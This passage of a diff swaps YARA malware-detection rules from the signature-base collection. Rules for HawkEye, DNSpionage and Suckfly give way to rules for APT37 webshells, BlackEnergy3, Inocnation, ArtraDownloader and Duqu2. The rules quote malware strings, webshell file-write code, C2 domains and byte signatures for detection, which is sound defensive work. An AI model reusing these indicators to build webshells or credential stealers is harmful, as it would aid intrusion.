-		logic_hash = "39037ccb90b747c098fbf5a504aee4a6a716901ff5841ae328ea40d06cc3fcfd"
-		score = 90
+		hash = "94d2448d3794ae3f29678a7337473d259b5cfd1c7f703fe53ee6c84dd10a48ef"
+		logic_hash = "58ccee11c08330c8cd4148e623a2e59e024d6d5f3067331dbdd962d0f6a8daa4"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "bb58922ad8d4a638e9d26076183de27fb39ace68aa7f73adc0da513ab66dc6fa"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "UploadReportLogin.asmx" fullword wide
-		$s2 = "tmp.exe" fullword wide
-		$s3 = "%appdata%\\" wide
+		$s1 = "strMsg = \"E : F\"" fullword ascii
+		$s2 = "strMsg = \"S : \" & Len(fileData)" fullword ascii
+		$s3 = "Left(workDir, InStrRev(workDir, \"/\")) & \"video\""
+		$a1 = "Server.CreateObject(\"Scripting.FileSystemObject\")" fullword ascii
+		$a2 = "Dim tmpPath, workDir" fullword ascii
+		$a3 = "Dim objFSO, objTextStream" fullword ascii
+		$a4 = "workDir = Request.ServerVariables(\"URL\")" fullword ascii
+		$a5 = "InStrRev(workDir, \"/\")" ascii
+		$g1 = "WriteFile = 0" fullword ascii
+		$g2 = "fileData = Request.Form(\"fp\")" fullword ascii
+		$g3 = "fileName = Request.Form(\"fr\")" fullword ascii
+		$g4 = "Err.Clear()" fullword ascii
+		$g5 = "Option Explicit" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
+		filesize < 2KB and ( ( 1 of ( $s* ) ) or ( 3 of ( $a* ) ) or ( 5 of ( $g* ) ) )
 }
-rule SIGNATURE_BASE_MAL_Hawkeye_Keylogger_Gen_Dec18
+rule SIGNATURE_BASE_Hvs_APT37_Webshell_Template_Query_Asp : FILE
 {
 	meta:
-		description = "Detects HawkEye Keylogger Reborn"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1d06f364-a4e2-5632-ad3a-d53a8cddf072"
-		date = "2018-12-10"
+		description = "Webshell named template-query.aspimg.asp used by APT37"
+		author = "Moritz Oettle"
+		id = "dc006b46-4c51-59cd-8b7d-adbfec86cd2e"
+		date = "2020-12-15"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/James_inthe_box/status/1072116224652324870"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_hawkeye.yar#L20-L34"
+		reference = "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_dec20.yar#L97-L120"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b850f02849030d9912b7571e33e969427ac8f721d2f288ae3ac3e971c4ee4263"
+		hash = "961a66d01c86fa5982e0538215b17fb9fae2991331dfea812b8c031e2ceb0d90"
+		logic_hash = "d8bd017e9103bddb0b8a86effa8a4b0617b54bd643bcc36b6f678a3e60f8559f"
 		score = 75
 		quality = 85
-		tags = ""
-		hash1 = "b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "HawkEye Keylogger" fullword wide
-		$s2 = "_ScreenshotLogger" ascii
-		$s3 = "_PasswordStealer" ascii
+		$g1 = "server.scripttimeout=600" fullword ascii
+		$g2 = "response.buffer=true" fullword ascii
+		$g3 = "response.expires=-1" fullword ascii
+		$g4 = "session.timeout=600" fullword ascii
+		$a1 = "redhat hacker" ascii
+		$a2 = "want_pre.asp" ascii
+		$a3 = "vgo=\"admin\"" ascii
+		$a4 = "ywc=false" ascii
+		$s1 = "public  br,ygv,gbc,ydo,yka,wzd,sod,vmd" fullword ascii
 
 	condition:
-		2 of them
+		filesize > 70KB and filesize < 200KB and ( ( 1 of ( $s* ) ) or ( 2 of ( $a* ) ) or ( 3 of ( $g* ) ) )
 }
-rule SIGNATURE_BASE_MAL_DNSPIONAGE_Malware_Nov18 : FILE
+rule SIGNATURE_BASE_Hvs_APT37_Webshell_Controllers_Asp : FILE
 {
 	meta:
-		description = "Detects DNSpionage Malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5a0b498b-b2e9-5827-9908-63586b2cf947"
-		date = "2018-11-30"
-		modified = "2023-01-06"
-		reference = "https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_dnspionage.yar#L2-L21"
+		description = "Webshell named controllers.asp or inc-basket-offer.asp used by APT37"
+		author = "Moritz Oettle"
+		id = "82370415-30f4-514d-8806-e2daced96f07"
+		date = "2020-12-15"
+		modified = "2023-12-05"
+		reference = "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_dec20.yar#L140-L218"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c7f148b790c391283ac833236ad7fd3af7af517098adeaf88b8ee8d95df11487"
+		hash = "829462fc6d84aae04a962dfc919d0a392265fbf255eab399980d2b021e385517"
+		logic_hash = "a6e53e99f7500683d3b62a7630cecb53ee6c13b335cbf9912366675db964aefe"
 		score = 75
-		quality = 85
+		quality = 28
 		tags = "FILE"
-		hash1 = "2010f38ef300be4349e7bc287e720b1ecec678cacbf0ea0556bcf765f6e073ec"
-		hash2 = "45a9edb24d4174592c69d9d37a534a518fbe2a88d3817fc0cc739e455883b8ff"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = ".0ffice36o.com" ascii
-		$s1 = "/Client/Login?id=" ascii
-		$s2 = ".\\Configure.txt" ascii
-		$s5 = "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" fullword ascii
-		$s6 = "Content-Disposition: form-data; name=\"txts\"" fullword ascii
+		$s0 = "<%@Language=VBScript.Encode" ascii
+		$x1 = { 64 7F 44 2D 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x2 = { 64 7F 49 2D 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x3 = { 64 7F 49 2D 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x4 = { 64 7F 49 23 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x5 = { 64 7F 49 23 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x6 = { 64 7F 49 23 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x7 = { 64 7F 49 23 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x8 = { 64 41 44 2D 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x9 = { 64 41 44 2D 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x10 = { 64 41 44 2D 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x11 = { 64 41 44 2D 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x12 = { 64 7F 44 2D 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x13 = { 64 41 44 23 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x14 = { 64 41 44 23 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x15 = { 64 41 44 23 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x16 = { 64 41 44 23 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x17 = { 64 41 49 2D 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x18 = { 64 41 49 2D 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x19 = { 64 41 49 2D 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x20 = { 64 41 49 2D 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x21 = { 64 41 49 23 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x22 = { 64 41 49 23 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x23 = { 64 7F 44 2D 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x24 = { 64 41 49 23 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x25 = { 64 41 49 23 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x26 = { 6A 7F 44 2D 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x27 = { 6A 7F 44 2D 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x28 = { 6A 7F 44 2D 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x29 = { 6A 7F 44 2D 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x30 = { 6A 7F 44 23 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x31 = { 6A 7F 44 23 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x32 = { 6A 7F 44 23 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x33 = { 6A 7F 44 23 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x34 = { 64 7F 44 2D 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x35 = { 6A 7F 49 2D 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x36 = { 6A 7F 49 2D 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x37 = { 6A 7F 49 2D 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x38 = { 6A 7F 49 2D 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x39 = { 6A 7F 49 23 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x40 = { 6A 7F 49 23 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x41 = { 6A 7F 49 23 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x42 = { 6A 7F 49 23 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x43 = { 6A 41 44 2D 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x44 = { 6A 41 44 2D 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x45 = { 64 7F 44 23 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x46 = { 6A 41 44 2D 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x47 = { 6A 41 44 2D 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x48 = { 6A 41 44 23 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x49 = { 6A 41 44 23 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x50 = { 6A 41 44 23 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x51 = { 6A 41 44 23 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x52 = { 6A 41 49 2D 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x53 = { 6A 41 49 2D 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x54 = { 6A 41 49 2D 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x55 = { 6A 41 49 2D 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x56 = { 64 7F 44 23 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x57 = { 6A 41 49 23 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x58 = { 6A 41 49 23 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x59 = { 6A 41 49 23 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x60 = { 6A 41 49 23 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x61 = { 64 7F 44 23 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x62 = { 64 7F 44 23 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x63 = { 64 7F 49 2D 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
+		$x64 = { 64 7F 49 2D 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or 2 of them )
+		filesize > 50KB and filesize < 200KB and ( $s0 and 1 of ( $x* ) )
 }
-rule SIGNATURE_BASE_APT_Dnspionage_Karkoff_Malware_Apr19_1 : FILE
+rule SIGNATURE_BASE_Trojan_Win32_Adupib_1 : PLATINUM
 {
 	meta:
-		description = "Detects DNSpionage Karkoff malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "be955760-ae94-5f77-928d-f4118a97ae6a"
-		date = "2019-04-24"
+		description = "Adupib SSL Backdoor"
+		author = "Microsoft"
+		id = "fb3b10a4-66d7-50ec-b6a5-b3c5c382ef01"
+		date = "2016-04-12"
 		modified = "2023-12-05"
-		reference = "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_dnspionage.yar#L23-L48"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ms_platinum.yara#L101-L122"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1e8157cec7e70f7c95dffecd1c5a820f29825586a95f2a5c6e4db0a51b1d4708"
+		hash = "d3ad0933e1b114b14c2b3a2c59d7f8a95ea0bcbd"
+		logic_hash = "4d93b6a041468b51763d9497acf3d01ee59ac05f1807a6b140c557ef96d26df9"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "6a251ed6a2c6a0a2be11f2a945ec68c814d27e2b6ef445f4b2c7a779620baa11"
-		hash2 = "b017b9fc2484ce0a5629ff1fed15bca9f62f942eafbb74da6a40f40337187b04"
-		hash3 = "5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c"
-		hash4 = "cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5"
+		tags = "PLATINUM"
+		unpacked_sample_sha1 = "a80051d5ae124fd9e5cc03e699dd91c2b373978b"
+		activity_group = "Platinum"
+		version = "1.0"
 
 	strings:
-		$x1 = "Karkoff.exe" fullword wide
-		$x2 = "kuternull.com" fullword wide
-		$x3 = "rimrun.com" fullword wide
-		$s1 = "C:\\Windows\\Temp\\" wide
-		$s2 = "CMD.exe" fullword wide
-		$s3 = "get_ProcessExtensionDataNames" fullword ascii
-		$s4 = "get_ProcessDictionaryKeys" fullword ascii
+		$str1 = "POLL_RATE"
+		$str2 = "OP_TIME(end hour)"
+		$str3 = "%d:TCP:*:Enabled"
+		$str4 = "%s[PwFF_cfg%d]"
+		$str5 = "Fake_GetDlgItemTextW: ***value***="
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or all of ( $s* ) )
+		$str1 and $str2 and $str3 and $str4 and $str5
 }
-rule SIGNATURE_BASE_Suckfly_Nidiran_Gen_1 : FILE
+rule SIGNATURE_BASE_Blackenergy3_Installer
 {
 	meta:
-		description = "Detects Suckfly Nidiran Trojan"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1abc596a-5fb1-55f9-b72d-022bfc6d10c7"
-		date = "2018-01-28"
+		description = "Matches unique code block for import name construction "
+		author = "Mike Schladt"
+		id = "4afeb7ac-ce8d-506c-9c97-db7ec6102490"
+		date = "2015-05-29"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_suckfly.yar#L14-L29"
+		reference = "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_blackenergy_installer.yar#L2-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bf617259df00b16272caffa8f1ffcf8d29cb98cb6ab85ca52e0bb0706f0cd5b0"
+		hash = "78387651dd9608fcdf6bfb9df8b84db4"
+		hash = "78636f7bbd52ea80d79b4e2a7882403092bbb02d"
+		logic_hash = "c4c562124427fd394b56e48f16f2d262c8a717fc750b955b2b2a35acb478d5e7"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ac7d7c676f58ebfa5def9b84553f00f283c61e4a310459178ea9e7164004e734"
+		tags = ""
 
 	strings:
-		$s1 = "WriteProcessMemory fail at %d " fullword ascii
-		$s2 = "CreateRemoteThread fail at %d " fullword ascii
-		$s3 = "CreateRemoteThread Succ" fullword ascii
+		$import_names = { C7 45 D0 75 73 65 72 C7 45 D4 33 32 2E 64 66 C7 45 D8 6C 6C 88 5D DA C7 45 84 61 64 76 61 C7 45 88 70 69 33 32 C7 45 8C 2E 64 6C 6C 88 5D 90 C7 45 B8 77 69 6E 69 C7 45 BC 6E 65 74 2E C7 45 C0 64 6C 6C 00 C7 45 C4 77 73 32 5F C7 45 C8 33 32 2E 64 66 C7 45 CC 6C 6C 88 5D CE C7 45 94 73 68 65 6C C7 45 98 6C 33 32 2E C7 45 9C 64 6C 6C 00 C7 45 E8 70 73 61 70 C7 45 EC 69 2E 64 6C 66 C7 45 F0 6C 00 C7 85 74 FF FF FF 6E 65 74 61 C7 85 78 FF FF FF 70 69 33 32 C7 85 7C FF FF FF 2E 64 6C 6C 88 5D 80 C7 85 64 FF FF FF 6F 6C 65 61 C7 85 68 FF FF FF 75 74 33 32 C7 85 6C FF FF FF 2E 64 6C 6C 88 9D 70 FF FF FF C7 45 DC 6F 6C 65 33 C7 45 E0 32 2E 64 6C 66 C7 45 E4 6C 00 C7 45 A0 76 65 72 73 C7 45 A4 69 6F 6E 2E C7 45 A8 64 6C 6C 00 C7 85 54 FF FF FF 69 6D 61 67 C7 85 58 FF FF FF 65 68 6C 70 C7 85 5C FF FF FF 2E 64 6C 6C 88 9D 60 FF FF FF C7 45 AC 61 70 70 68 C7 45 B0 65 6C 70 2E C7 45 B4 64 6C 6C 00 C7 45 F4 2E 64 6C 6C 88 5D F8 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them
+		any of them
 }
-rule SIGNATURE_BASE_Suckfly_Nidiran_Gen_2 : FILE
+rule SIGNATURE_BASE_Apt_Win32_Dll_Rat_1A53B0Cp32E46G0Qio7 : FILE
 {
 	meta:
-		description = "Detects Suckfly Nidiran Trojan"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b090079d-1c22-5931-a25b-e960343a610f"
-		date = "2018-01-28"
+		description = "Detects Inocnation Malware"
+		author = "Fidelis Cybersecurity"
+		id = "1f2250b7-fee4-5031-aeba-90d35319b560"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_suckfly.yar#L31-L59"
+		reference = "https://www.fidelissecurity.com/sites/default/files/FTA_1020_Fidelis_Inocnation_FINAL.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_inocnation.yar#L1-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2e4f6a920e063113a9ff252869e1c2ebdf5a2495b4adb1edaf9500904234f362"
+		logic_hash = "824997d8c8845838420f226b60de544f33a50327fa67aea472de6eaf1b6b4492"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b53a316a03b46758cb128e5045dab2717cb36e7b5eb1863ce2524d4f69bc2cab"
-		hash2 = "eaee2bf83cf90d35dab8a4711f7a5f2ebf9741007668f3746995f4564046fbdf"
+		hash1 = "75d3d1f23628122a64a2f1b7ef33f5cf"
+		hash2 = "d9821468315ccd3b9ea03161566ef18e"
+		hash3 = "b9af5f5fd434a65d7aa1b55f5441c90a"
 
 	strings:
-		$x1 = "WorkDll.dll" fullword ascii
-		$x2 = "%userprofile%\\Security Center\\secriter.dll" fullword ascii
-		$s1 = "DLL_PROCESS_ATTACH is called" fullword ascii
-		$s2 = "Support Security Accounts Manager For Microsoft Windows.If this service is stopped, any services that depended on it will fail t" ascii
-		$s3 = "before CreateRemoteThread" fullword ascii
-		$s4 = "CreateRemoteThread Succ" fullword ascii
-		$s5 = "Microsoft Security Accounts Manager" fullword ascii
-		$s6 = "DoRunRemote" fullword ascii
-		$s7 = "AutoRunFun" fullword ascii
-		$s8 = "ServiceMain is called" fullword ascii
-		$s9 = "DllRegisterServer is called" fullword ascii
+		$s1 = { c7 [2] 64 00 63 00 c7 [2] 69 00 62 00 c7 [2] 7a 00 7e 00 c7 [2] 2d 00 43 00 c7 [2] 59 00 2d 00 c7 [2] 3b 00 23 00 c7 [2] 3e 00 36 00 c7 [2] 2d 00 5a 00 c7 [2] 42 00 5a 00 c7 [2] 3b 00 39 00 c7 [2] 36 00 2d 00 c7 [2] 59 00 7f 00 c7 [2] 64 00 69 00 c7 [2] 68 00 63 00 c7 [2] 79 00 22 00 c7 [2] 3a 00 23 00 c7 [2] 3d 00 36 00 c7 [2] 2d 00 7f 00 c7 [2] 7b 00 37 00 c7 [2] 3c 00 3c 00 c7 [2] 23 00 3d 00 c7 [2] 24 00 2d 00 c7 [2] 61 00 64 00 c7 [2] 66 00 68 00 c7 [2] 2d 00 4a 00 c7 [2] 68 00 6e 00 c7 [2] 66 00 62 00 }
+		$s2 = { c7 [2] 23 00 24 00 c7 [2] 24 00 33 00 c7 [2] 38 00 22 00 c7 [2] 00 00 33 00 c7 [2] 24 00 25 00 c7 [2] 3f 00 39 00 c7 [2] 38 00 0a 00 c7 [2] 04 00 23 00 c7 [2] 38 00 00 00 c7 [2] 43 00 66 00 c7 [2] 6d 00 60 00 c7 [2] 67 00 52 00 c7 [2] 6e 00 63 00 c7 [2] 7b 00 67 00 c7 [2] 70 00 00 00 c7 [2] 43 00 4d 00 c7 [2] 44 00 00 00 c7 [2] 0f 00 43 00 c7 [2] 00 00 50 00 c7 [2] 49 00 4e 00 c7 [2] 47 00 00 00 c7 [2] 11 00 12 00 c7 [2] 17 00 0e 00 c7 [2] 10 00 0e 00 c7 [2] 10 00 0e 00 c7 [2] 11 00 06 00 c7 [2] 44 00 45 00 c7 [2] 4c 00 00 00 }
+		$s3 = { 66 [4-7] 0d 40 83 f8 44 7c ?? }
+		$s4 = { 66 [4-7] 14 40 83 f8 14 7c ?? }
+		$s5 = { 66 [4-7] 56 40 83 f8 2d 7c ?? }
+		$s6 = { 66 [4-7] 20 40 83 f8 1a 7c ?? }
+		$s7 = { 80 [2-7] 2e 40 3d 50 02 00 00 72 ?? }
+		$s8 = "%08x%08x%08x%08x" wide ascii
+		$s9 = "WinHttpGetIEProxyConfigForCurrentUser" wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or 4 of them )
+		( uint16( 0 ) == 0x5A4D or uint32( 0 ) == 0x464c457f ) and ( all of them )
 }
-
-rule SIGNATURE_BASE_Suckfly_Nidiran_Gen_3 : FILE
+rule SIGNATURE_BASE_APT_Artradownloader2_Aug19_1 : FILE
 {
 	meta:
-		description = "Detects Suckfly Nidiran Trojan"
+		description = "Detects ArtraDownloader malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d9daf7e4-2cfa-50c9-84d2-c971734abe5e"
-		date = "2018-01-28"
+		id = "0e688e92-2366-5f36-a32d-083982181eb7"
+		date = "2019-08-27"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_suckfly.yar#L61-L88"
+		reference = "https://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_patchwork.yar#L2-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4fddb55999bbbeecd92863219e878c840640e4d17008cb789a255528ef3fac9c"
+		logic_hash = "c365c3d678c881eeb626b5d26e6164b473990387619337459ccdd8d9f0633b49"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c2022e1114b162e79e44d974fd310d53e1bbdd8cb4f217553c1227cafed78855"
-		hash2 = "47731c9d985ebc2bd7227fced3cc44c6d72e29b52f76fccbdaddd76cc3450706"
+		hash1 = "f0ef4242cc6b8fa3728b61d2ce86ea934bd59f550de9167afbca0b0aaa3b2c22"
 
 	strings:
-		$x1 = "RUN SHELLCODE FAIL" fullword ascii
-		$x2 = "RUN PROCESS FAILD!" fullword ascii
-		$x3 = "DOWNLOAD FILE FAILD" fullword ascii
-		$x4 = "MODIFYCONFIG FAIL!" fullword ascii
-		$x5 = "GetFileAttributes FILE FAILD" fullword ascii
-		$x6 = "MODIFYCONFIG SUCC!" fullword ascii
-		$s1 = "cmd.exe /c %s" fullword ascii
-		$s2 = "error to create pipe!" fullword ascii
-		$s3 = "%s\\%08x.exe" fullword ascii
+		$xc1 = { 47 45 54 20 25 73 20 48 54 54 50 2F 31 2E 30 00
+               0D 0A 00 00 48 6F 73 74 3A 20 25 73 00 00 00 00
+               3F 61 3D 00 26 62 3D 00 26 63 3D 00 26 64 3D 00
+               26 65 3D 00 25 32 30 }
+		$xc2 = { 25 73 20 25 73 20 25 73 0D 0A 25 73 20 25 73 0D
+               0A 25 73 25 73 0D 0A 25 73 25 73 0D 0A 25 73 20
+               25 64 0D 0A 0D 0A 25 73 00 00 00 00 71 72 79 3D }
+		$xc3 = { 49 44 3D 25 73 00 00 00 3A 00 00 00 25 73 20 25
+               73 20 25 73 0D 0A 25 73 20 25 73 0D 0A 25 73 25
+               73 0D 0A 25 73 25 73 0D 0A 43 6F 6E 74 65 6E 74
+               2D 6C 65 6E 67 74 68 25 73 20 25 64 }
+		$xc4 = { 25 73 20 25 73 20 25 73 0D 0A 25 73 20 25 73 0D
+               0A 25 73 25 73 0D 0A 25 73 25 73 0D 0A 43 6F 6E
+               74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 25 64 0D
+               0A 0D 0A 25 73 }
+		$x1 = "Tpguxbsf]Njdsptpgu" ascii
+		$x2 = ".gpsn.vsmfodpefe" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "ae0f4ebf7e8ce91d6548318a3cf82b7a" or 1 of ( $x* ) or 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and 1 of them
 }
-rule SIGNATURE_BASE_Dubseven_File_Set : FILE
+rule SIGNATURE_BASE_APT_Apt_Duqu2_Loaders : FILE
 {
 	meta:
-		description = "Searches for service files loading UP007"
-		author = "Matt Brooks, @cmatthewbrooks"
-		id = "5b0a9cb9-aeef-5508-8854-51ad846b22c5"
-		date = "2016-04-18"
+		description = "Rule to detect Duqu 2.0 samples"
+		author = "Kaspersky Lab"
